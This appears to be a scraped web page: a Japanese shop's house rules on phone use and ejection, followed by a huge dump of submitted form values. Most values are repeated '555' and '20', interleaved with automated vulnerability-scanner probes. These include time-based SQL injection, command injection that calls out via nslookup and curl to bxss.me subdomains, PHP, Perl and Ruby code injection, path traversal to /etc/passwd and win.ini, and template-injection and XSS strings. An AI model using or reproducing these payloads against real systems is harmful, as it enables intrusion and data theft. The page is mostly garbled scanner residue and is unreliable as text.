※店内での迷惑行為・連絡先交換が発覚・クレームが出た場合
即時退店・以後の入店をお断りさせて頂きます。
その際の入場料の返金は一切致しません。
※店内での携帯電話のご利用・スマートウォッチの着用は禁止とさせていただきます。
必ずロッカーに閉まって頂きます様にお願い致します。
使用が発覚・他のお客様から指摘がある際は、即時退店・以後の入店をお断りさせて頂きます
その際の入場料の返金は一切致しません。
555
555
555
555
555
20
20
555
555
555
20
555
555
20
555
20
555
555
555
555
555
555
555
20
555
555
555
555
555
555
555
555
555
555
555
555
555
20
20
20
20
20
555
20
20
555
555
555
555
555
555
555
555
555
555
555
20
555
555
555
555
20
555
555
555
555
20
555
555
20
555
555
20
555
555
20
555
555
20
555
555
20
555
20
555
555
555
555
20
555
555
555
555
555
555
20
20
555
20
555
555
20
20
20
20
555
20
555
20
555
20
555
555
555
555
20
555
555
20
555
555
555
555
555
20
555
555
555
555
555
555
555
20
555
555
555
555
555
20
555
555
20
555
555
555
555
555
20
555
555
555
555
555
555
555
555
555
555
20
555
20
555
555
555
555
555
555
20
20
20
555
555
20
555
555
20
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
20
555
555
555
555
555
555
555
555
20
555
555
555
20
20
555
555
20
555
555
555
555
555
20
555
555
555
555
555
555
555
555
555
555
555
555
555
555
20
555
555
555
555
555
555
555
20
555
555
20
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
20
555
555
555
20
555
555
20
555
555
20
555
555
555
555
20
555
555
20
555
555
20
20
20
555
555
555
555
555
20
555
20
20
20
20
20
20
20
555
20
555
-1 OR 2+771-771-1=0+0+0+1 --
-1 OR 2+661-661-1=0+0+0+1
-1' OR 2+147-147-1=0+0+0+1 --
-1' OR 2+51-51-1=0+0+0+1 or 'W0aRgzxn'='
-1" OR 2+721-721-1=0+0+0+1 --
20
555*if(now()=sysdate(),sleep(15),0)
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555
20
555-1; waitfor delay '0:0:15' --
555
20
-1 OR 2+833-833-1=0+0+0+1 --
-1' OR 2+36-36-1=0+0+0+1 --
-1' OR 2+243-243-1=0+0+0+1 or 'tHfxBkW6'='
-1" OR 2+773-773-1=0+0+0+1 --
555-1); waitfor delay '0:0:0' --
20
555-1); waitfor delay '0:0:6' --
555*if(now()=sysdate(),sleep(0),0)
20
555-1 waitfor delay '0:0:6' --
20
555Zy4IRONe'; waitfor delay '0:0:15' --
20
555
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555
555
555
-1 OR 2+960-960-1=0+0+0+1
555-1 OR 811=(SELECT 811 FROM PG_SLEEP(15))--
-1' OR 2+73-73-1=0+0+0+1 or 'qm4XzCBX'='
-1" OR 2+370-370-1=0+0+0+1 --
555-1) OR 102=(SELECT 102 FROM PG_SLEEP(15))--
555*if(now()=sysdate(),sleep(15),0)
20
20
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
20
20
555-1)) OR 334=(SELECT 334 FROM PG_SLEEP(15))--
20
20
555-1; waitfor delay '0:0:15' --
555yMd4ns85' OR 273=(SELECT 273 FROM PG_SLEEP(15))--
20
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
20
20
555-1); waitfor delay '0:0:6' --
20
20
20
20
555-1 waitfor delay '0:0:15' --
20
555MCZwnYPW'; waitfor delay '0:0:15' --
555-1 OR 744=(SELECT 744 FROM PG_SLEEP(15))--
555-1; waitfor delay '0:0:15' --
20
555-1) OR 262=(SELECT 262 FROM PG_SLEEP(15))--
555-1); waitfor delay '0:0:15' --
20
555-1 waitfor delay '0:0:6' --
555511oVKOn')) OR 15=(SELECT 15 FROM PG_SLEEP(0))--
20
555-1)) OR 779=(SELECT 779 FROM PG_SLEEP(3))--
555ubDDWuMg'; waitfor delay '0:0:15' --
555rfICgYSs' OR 86=(SELECT 86 FROM PG_SLEEP(15))--
555-1 OR 456=(SELECT 456 FROM PG_SLEEP(15))--
555FQHzINev')) OR 649=(SELECT 649 FROM PG_SLEEP(15))--
20
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555NM5JZrI1') OR 213=(SELECT 213 FROM PG_SLEEP(3))--
555-1) OR 96=(SELECT 96 FROM PG_SLEEP(3))--
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555'"
20
555pEjOmyfw')) OR 906=(SELECT 906 FROM PG_SLEEP(15))--
555-1)) OR 31=(SELECT 31 FROM PG_SLEEP(15))--
20
555fGo2L9K1' OR 145=(SELECT 145 FROM PG_SLEEP(15))--
555
20
555
555
555
555
555
555
20
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),6)
555LN3dqU4X') OR 189=(SELECT 189 FROM PG_SLEEP(0))--
20
20
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),3)||'
555'"
555ngdVud7E') OR 336=(SELECT 336 FROM PG_SLEEP(3))--
20
20
20
555
555
555
20
20
555
555
555
555
20
555
555
555
555
20
555
20
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),3)
555
555
-1 OR 2+481-481-1=0+0+0+1
-1' OR 2+134-134-1=0+0+0+1 --
-1' OR 2+461-461-1=0+0+0+1 or 'zPo2z4Po'='
-1" OR 2+375-375-1=0+0+0+1 --
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555'"
@@qhdCh
20*if(now()=sysdate(),sleep(15),0)
555
555
200'XOR(20*if(now()=sysdate(),sleep(15),0))XOR'Z
555
555
555
555
555
555
555
555
555
200"XOR(20*if(now()=sysdate(),sleep(15),0))XOR"Z
555
555
555
(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/
555
20-1; waitfor delay '0:0:15' --
555
555
20-1); waitfor delay '0:0:15' --
555
555
20-1 waitfor delay '0:0:15' --
555
555
555
2078i2XqSM'; waitfor delay '0:0:0' --
555
20TcvtaY3M'; waitfor delay '0:0:6' --
555
555
555
555
555
555
555
555
555
555
20-1 OR 917=(SELECT 917 FROM PG_SLEEP(0))--
555
20-1 OR 922=(SELECT 922 FROM PG_SLEEP(0))--
555
20-1 OR 394=(SELECT 394 FROM PG_SLEEP(6))--
555
555
20-1) OR 97=(SELECT 97 FROM PG_SLEEP(15))--
555
555
20-1)) OR 537=(SELECT 537 FROM PG_SLEEP(15))--
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
205OqjSv1G') OR 880=(SELECT 880 FROM PG_SLEEP(6))--
555
555
555
20VH3K0mWY')) OR 327=(SELECT 327 FROM PG_SLEEP(3))--
555
555
555
555
555
555
555
555
555
555
555
20*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),0)
555
555
555
555
20*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),0)
555
555
555
555
555
20'"
@@PpHLu
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-1 OR 2+872-872-1=0+0+0+1 --
-1 OR 2+241-241-1=0+0+0+1
-1' OR 2+576-576-1=0+0+0+1 --
-1' OR 2+12-12-1=0+0+0+1 or 'k2LE6FAy'='
-1" OR 2+900-900-1=0+0+0+1 --
555*if(now()=sysdate(),sleep(15),0)
555
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
555
5550"XOR(555*if(now()=sysdate(),sleep(6),0))XOR"Z
555
(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/
555-1; waitfor delay '0:0:15' --
555-1); waitfor delay '0:0:15' --
555-1 waitfor delay '0:0:0' --
555-1 waitfor delay '0:0:15' --
555
555
555
555
555-1 OR 525=(SELECT 525 FROM PG_SLEEP(6))--
555
555-1) OR 128=(SELECT 128 FROM PG_SLEEP(15))--
555
555-1)) OR 857=(SELECT 857 FROM PG_SLEEP(15))--
555
555mm01trsg' OR 296=(SELECT 296 FROM PG_SLEEP(15))--
555
555woS2qQBd') OR 694=(SELECT 694 FROM PG_SLEEP(15))--
555
555DshvnThp')) OR 378=(SELECT 378 FROM PG_SLEEP(6))--
555
555
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555'"
@@aStsH
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-1 OR 2+93-93-1=0+0+0+1 --
-1 OR 2+474-474-1=0+0+0+1
-1' OR 2+30-30-1=0+0+0+1 --
-1' OR 2+424-424-1=0+0+0+1 or 'UpwPYTG0'='
-1" OR 2+736-736-1=0+0+0+1 --
555*if(now()=sysdate(),sleep(15),0)
5550'XOR(555*if(now()=sysdate(),sleep(15),0))XOR'Z
5550"XOR(555*if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
555-1; waitfor delay '0:0:15' --
555-1); waitfor delay '0:0:6' --
555-1 waitfor delay '0:0:15' --
555aeAZms3P'; waitfor delay '0:0:15' --
555-1) OR 950=(SELECT 950 FROM PG_SLEEP(15))--
555-1)) OR 536=(SELECT 536 FROM PG_SLEEP(6))--
555OvbzICBk' OR 961=(SELECT 961 FROM PG_SLEEP(15))--
555UOPbd53t') OR 970=(SELECT 970 FROM PG_SLEEP(15))--
555GdEXc8kF')) OR 43=(SELECT 43 FROM PG_SLEEP(15))--
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555'"
@@rYnsH
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
17N7Q9LH30
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
4bWtuLpz
redirtest.acx
555
tMezyAKi: 52g6fCBl
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'.gethostbyname(lc('hitnr'.'qzwjyvaq358a2.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(119).chr(84).chr(103).chr(88).'
555
".gethostbyname(lc("hitfj"."ncufpfeaeed00.bxss.me."))."A".chr(67).chr(hex("58")).chr(101).chr(85).chr(119).chr(75)."
gethostbyname(lc('hitba'.'qnjgnjzafcd5a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(70).chr(101).chr(89)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
${9999259+9999694}
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
12345'"\'\");|]*%00{%0d%0a%bf%27'💡
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
response.write(9830170*9619306)
'+response.write(9830170*9619306)+'
555
"+response.write(9830170*9619306)+"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'"()
555
555'&&sleep(27*1000)*teyfms&&'
555"&&sleep(27*1000)*uiclsm&&"
555
555
555
555
555'||sleep(27*1000)*vfljgz||'
555
555"||sleep(27*1000)*vfkgcm||"
555&n988169=v950872
555
555
555
555
555
555
555
555
555
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
555
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
555
555
c:/windows/win.ini
bxss.me
http://bxss.me/t/fit.txt
555
http://bxss.me/t/fit.txt%3F.jpg
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
)
555
"+"A".concat(70-3).concat(22*4).concat(111).concat(75).concat(105).concat(78)+(require"socket"
Socket.gethostbyname("hitds"+"czzayydne8105.bxss.me.")[3].to_s)+"
555
'+'A'.concat(70-3).concat(22*4).concat(114).concat(66).concat(105).concat(86)+(require'socket'
Socket.gethostbyname('hitlc'+'wmbdzycp442d2.bxss.me.')[3].to_s)+'
!(()&&!|*|*|
'A'.concat(70-3).concat(22*4).concat(97).concat(79).concat(98).concat(76)+(require'socket'
Socket.gethostbyname('hitlv'+'jiliuiob977be.bxss.me.')[3].to_s)
^(#$!@#$)(()))******
555
./555
555
555
555
555
555
555
555
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
555
555
555
555
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
555
555
555
555
555
555
%2fetc%2fpasswd
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
/WEB-INF/web.xml
555
C:\WINDOWS\system32\drivers\etc\hosts
555
555
555
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
555
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
555
xfs.bxss.me
555
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
555
555
555
expr 9000232826 - 938649
(nslookup -q=cname hitomjjjipecse0aee.bxss.me||curl hitomjjjipecse0aee.bxss.me))
555
WEB-INF/web.xml
555
WEB-INF\web.xml
$(nslookup -q=cname hitjagxwcaoei00a94.bxss.me||curl hitjagxwcaoei00a94.bxss.me)
&nslookup -q=cname hitcyxetozwce4c909.bxss.me&'\"`0&nslookup -q=cname hitcyxetozwce4c909.bxss.me&`'
&(nslookup -q=cname hitnswfbsihdz49c8f.bxss.me||curl hitnswfbsihdz49c8f.bxss.me)&'\"`0&(nslookup -q=cname hitnswfbsihdz49c8f.bxss.me||curl hitnswfbsihdz49c8f.bxss.me)&`'
555
555
555
|(nslookup -q=cname hitnlgryyioazc2b5d.bxss.me||curl hitnlgryyioazc2b5d.bxss.me)
555
`(nslookup -q=cname hitruzuowfhbk15836.bxss.me||curl hitruzuowfhbk15836.bxss.me)`
555
555
;(nslookup -q=cname hitunvmfglslb38dda.bxss.me||curl hitunvmfglslb38dda.bxss.me)|(nslookup -q=cname hitunvmfglslb38dda.bxss.me||curl hitunvmfglslb38dda.bxss.me)&(nslookup -q=cname hitunvmfglslb38dda.bxss.me||curl hitunvmfglslb38dda.bxss.me)
555
|(nslookup${IFS}-q${IFS}cname${IFS}hitrqkwgbdanc3ee83.bxss.me||curl${IFS}hitrqkwgbdanc3ee83.bxss.me)
&(nslookup${IFS}-q${IFS}cname${IFS}hitpcqqxbimuj781fd.bxss.me||curl${IFS}hitpcqqxbimuj781fd.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitpcqqxbimuj781fd.bxss.me||curl${IFS}hitpcqqxbimuj781fd.bxss.me)&`'
555
555
555
'"
<!--
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
http://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'.gethostbyname(lc('hitne'.'cqwddrgxb43bb.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(77).chr(115).chr(73).'
555
555
555
".gethostbyname(lc("hitxb"."uymbrpst37b50.bxss.me."))."A".chr(67).chr(hex("58")).chr(102).chr(65).chr(108).chr(74)."
gethostbyname(lc('hitoc'.'qkurinxna0b5a.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(99).chr(77).chr(117).chr(67)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
redirtest.acx
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
555
';print(md5(31337));$a='
555
";print(md5(31337));$a="
555
${@print(md5(31337))}
555
555
555
555
555
555
${@print(md5(31337))}\
'.print(md5(31337)).'
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
Mtx9RSlq
1BJW5cQM: 8QbWvxSm
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
${9999771+10000246}
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
response.write(9573548*9208982)
555
555
'+response.write(9573548*9208982)+'
555
555
12345'"\'\");|]*%00{%0d%0a%bf%27'💡
555
"+response.write(9573548*9208982)+"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'"()
555'&&sleep(27*1000)*sdsvfy&&'
555
555"&&sleep(27*1000)*rrclic&&"
555
555
555'||sleep(27*1000)*ebaarl||'
555
555"||sleep(27*1000)*ftszgg||"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-1 OR 5*5=25 --
555
-1 OR 5*5=25
555
555
-1' OR 5*5=25 --
555
555
-1" OR 5*5=25 --
555
555
555
555
555*if(now()=sysdate(),sleep(15),0)
555
555
555
555
555
555
555
555
555
555
555
555
555
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
555
555
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
555
555
555
555
555
c:/windows/win.ini
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
bxss.me
555
http://bxss.me/t/fit.txt
555'"
http://bxss.me/t/fit.txt%3F.jpg
555
555
555
@@LMUYj
555
(select 198766*667891)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
)
555
!(()&&!|*|*|
555
555
^(#$!@#$)(()))******
555
555
555
555
555
./555
555
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
555
555
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
555&n945319=v911467
555
555
555
555
555
%2fetc%2fpasswd
555
555
555
555
555
555
555
555
555
555
555
555
555
555
/WEB-INF/web.xml
555
555
C:\WINDOWS\system32\drivers\etc\hosts
555
555
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
555
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
555
555
555
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
WEB-INF/web.xml
WEB-INF\web.xml
555
555
555
expr 9000280909 - 974421
555
(nslookup -q=cname hitslxdmuijxr9e023.bxss.me||curl hitslxdmuijxr9e023.bxss.me))
$(nslookup -q=cname hitdgjwymirzidb23f.bxss.me||curl hitdgjwymirzidb23f.bxss.me)
555
555
&nslookup -q=cname hitfqluawenxi26bd8.bxss.me&'\"`0&nslookup -q=cname hitfqluawenxi26bd8.bxss.me&`'
&(nslookup -q=cname hitwkdtuclnuq5b624.bxss.me||curl hitwkdtuclnuq5b624.bxss.me)&'\"`0&(nslookup -q=cname hitwkdtuclnuq5b624.bxss.me||curl hitwkdtuclnuq5b624.bxss.me)&`'
|(nslookup -q=cname hitplnnykbjcvc67a0.bxss.me||curl hitplnnykbjcvc67a0.bxss.me)
555
`(nslookup -q=cname hiteigdrfmnir8ada2.bxss.me||curl hiteigdrfmnir8ada2.bxss.me)`
555
;(nslookup -q=cname hitizofqntdoz286ef.bxss.me||curl hitizofqntdoz286ef.bxss.me)|(nslookup -q=cname hitizofqntdoz286ef.bxss.me||curl hitizofqntdoz286ef.bxss.me)&(nslookup -q=cname hitizofqntdoz286ef.bxss.me||curl hitizofqntdoz286ef.bxss.me)
555
|(nslookup${IFS}-q${IFS}cname${IFS}hitjdpondmokr27fbd.bxss.me||curl${IFS}hitjdpondmokr27fbd.bxss.me)
555
555
&(nslookup${IFS}-q${IFS}cname${IFS}hitayvhzzzeed1891b.bxss.me||curl${IFS}hitayvhzzzeed1891b.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitayvhzzzeed1891b.bxss.me||curl${IFS}hitayvhzzzeed1891b.bxss.me)&`'
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
xfs.bxss.me
555
555
555
555
555
555
555
555
"+"A".concat(70-3).concat(22*4).concat(118).concat(85).concat(115).concat(65)+(require"socket"
Socket.gethostbyname("hitqx"+"seccbodx45177.bxss.me.")[3].to_s)+"
'+'A'.concat(70-3).concat(22*4).concat(122).concat(72).concat(117).concat(75)+(require'socket'
Socket.gethostbyname('hitpo'+'ebvrdenk725b5.bxss.me.')[3].to_s)+'
'A'.concat(70-3).concat(22*4).concat(104).concat(73).concat(104).concat(75)+(require'socket'
Socket.gethostbyname('hitcc'+'nnenvihm12b33.bxss.me.')[3].to_s)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'"
555
555
<!--
555
555
555
555
555
555
555
555
555
555
555
555
http://bxss.me/t/xss.html?%00
bxss.me/t/xss.html?%00
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
'.gethostbyname(lc('hitck'.'vodooxas9fbe4.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(82).chr(100).chr(72).'
555
".gethostbyname(lc("hitai"."xfoqzjlhc3932.bxss.me."))."A".chr(67).chr(hex("58")).chr(99).chr(84).chr(111).chr(89)."
555
gethostbyname(lc('hitzu'.'rqdeizpb4a2be.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(116).chr(70).chr(97).chr(81)
555
555
555
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
';print(md5(31337));$a='
555
";print(md5(31337));$a="
${@print(md5(31337))}
555
${@print(md5(31337))}\
555
'.print(md5(31337)).'
555
555
555
555
555
redirtest.acx
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
dsqmIKU3
gHF3AFXz: ohzcNHWB
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
${9999876+9999023}
555
555
555
555
555
555
555
555
12345'"\'\");|]*%00{%0d%0a%bf%27'💡
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
-1 OR 5*5=25 --
555
555
-1 OR 5*5=25
-1' OR 5*5=25 --
555
-1" OR 5*5=25 --
555
555
555
555
555
555*if(now()=sysdate(),sleep(15),0)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
555
555'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
555
555
555
555
555
555
555'"
555
555
@@OrEYz
555
555
555
(select 198766*667891)
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
response.write(9948787*9331632)
555
555
555
'+response.write(9948787*9331632)+'
555
'"()
555
555'&&sleep(27*1000)*jsbela&&'
555
555"&&sleep(27*1000)*noribt&&"
555
"+response.write(9948787*9331632)+"
555
555'||sleep(27*1000)*wqksnk||'
555
555
555
555"||sleep(27*1000)*panrrn||"
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
expr 9000592559 - 922483
555
555
555
(nslookup -q=cname hitimgbkhwpos4d09a.bxss.me||curl hitimgbkhwpos4d09a.bxss.me))
555
$(nslookup -q=cname hitknrokmrzpk43416.bxss.me||curl hitknrokmrzpk43416.bxss.me)
555
&nslookup -q=cname hitcbmhcvttdc1b510.bxss.me&'\"`0&nslookup -q=cname hitcbmhcvttdc1b510.bxss.me&`'
555
&(nslookup -q=cname hitsmztyxgcdo7a3bb.bxss.me||curl hitsmztyxgcdo7a3bb.bxss.me)&'\"`0&(nslookup -q=cname hitsmztyxgcdo7a3bb.bxss.me||curl hitsmztyxgcdo7a3bb.bxss.me)&`'
|(nslookup -q=cname hitllpqyoucet649ab.bxss.me||curl hitllpqyoucet649ab.bxss.me)
555
555
`(nslookup -q=cname hitdwlspfdjec98e87.bxss.me||curl hitdwlspfdjec98e87.bxss.me)`
;(nslookup -q=cname hitgnhllivuksd8689.bxss.me||curl hitgnhllivuksd8689.bxss.me)|(nslookup -q=cname hitgnhllivuksd8689.bxss.me||curl hitgnhllivuksd8689.bxss.me)&(nslookup -q=cname hitgnhllivuksd8689.bxss.me||curl hitgnhllivuksd8689.bxss.me)
|(nslookup${IFS}-q${IFS}cname${IFS}hithmipoghyxh1a87b.bxss.me||curl${IFS}hithmipoghyxh1a87b.bxss.me)
555
555
555
&(nslookup${IFS}-q${IFS}cname${IFS}hitphqkybpxmq993d8.bxss.me||curl${IFS}hitphqkybpxmq993d8.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitphqkybpxmq993d8.bxss.me||curl${IFS}hitphqkybpxmq993d8.bxss.me)&`'
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555
555